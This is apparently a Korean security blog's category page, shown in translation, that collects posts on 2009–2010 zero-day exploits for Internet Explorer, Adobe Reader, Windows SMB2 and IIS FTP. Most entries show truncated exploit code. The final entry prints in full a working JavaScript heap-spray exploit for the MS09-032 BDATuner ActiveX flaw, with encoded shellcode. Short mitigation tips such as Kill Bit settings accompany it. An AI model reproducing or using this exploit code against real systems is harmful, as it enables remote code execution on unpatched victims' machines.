Category: Vulnerability

Internet Explorer 0-Day – MS10-002, CVE-2010-0249

Hot on the heels of Microsoft's January patches, a 0-Day vulnerability in Internet Explorer has appeared. It is the Aurora vulnerability, reported to have been used in the attack on Google in China. A Metasploit module is already out and code written in Python has been published, so please be careful.

[Metasploit code]
[code]
##
# $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# …

Adobe Reader and Acrobat (CVE-2009-4324) Exploit

Not long ago a zero-day was reported in Adobe Reader and Acrobat, and exploit code for it has now been published. If you open a PDF file generated with the code below, you can see that the calculator runs. It only works when JavaScript is enabled, though, so until a patch comes out it seems best to disable that feature. (Since I hardly ever use it anyway, it might be better to just leave it disabled…)

[code]
##   Author : Ahmed Obied (ahmed.obied@gmail.com)
##   This program generates …

Internet Explorer 6/7 CSS Handling Denial of Service

An Internet Explorer vulnerability was posted on the Offensive Security site. The shellcode section of the posted PoC appears to be calculator-spawning shellcode, but it looks like it needs modifying. Below is the modified PoC code. Hmm.. so is this one next?

[code]
<!-- securitylab.ir K4mr4n_st (at) yahoo (dot) com [email concealed] -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<script>
function load(){
  var e;
  e=document.getElementsByTagName("STYLE")[0];
  e.outerHTML="1";
}
</script>
<STYLE type="text/css">body{ overflow: scroll; margin: 0; }</style>
<SCRIPT language="javascript">
var shellcode …

Windows 7, Server 2008R2 Remote Kernel Crash

=============================================
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffie
- Severity: Medium/High
=============================================

I. VULNERABILITY
-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash

II. BACKGROUND
-------------------------
#FAIL,#FAIL,#FAIL
SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL

III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details

#Comment: This bug is specific to Windows 7/2008R2.

IV. PROOF OF CONCEPT
-------------------------
[code]
#win7-crash.py:
#Trigger a …

Vista/2008/Windows 7 SMB2 BSOD 0Day

A BSOD (Blue Screen Of Death) vulnerability in SMB 2.0 on Vista / 2008 / Windows 7 has come out. In a way it is a critical vulnerability, but it's just so-so....

[code lang-python]
#!/usr/bin/python
# When SMB2.0 receives a '&' char in the 'Process Id High' SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from time import sleep
from socket import *
import sys

if len(sys.argv) != 3:
    print …

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

On August 31 a zero-day was posted on the milw0rm site. It's a Windows FTP server vulnerability, and since it's remote the severity looks high.

http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/msftp.html

[code]
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, …

Microsoft Windows 'BDATuner.MPEG2TuneRequest.1' Object Remote Code Execution Vulnerability (CVE-2008-0015, MS09-032)

[code]
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+'%u5858%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8%uFFFF%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%uDCE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u668E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%uD5DB%uc9c9%u87cd%u9292%ud4d0%ud1d1%ud6d1%ude93%ud0d2%uca92%u92d0%ucbce%ud5de%uced2%u93c9%uc5d8%ubdd8%ubdBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uEAEA'); // xor:0BD
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000) // generate a large amount of data
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif'; // a non-GIF file
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
[/code]

No patch is available yet, and a Kill Bit setting looks necessary as a temporary measure. For how to set it, see http://jjoon.net/tc/entry/Kill-Bit-%BC%B3%C1%A4-%B9%E6%B9%FD.

- Other Korean site information -
Ahnlab ASEC Threat Research: http://blog.ahnlab.com/asec/47
NCHOVY: http://nchovy.kr/forum/2/article/458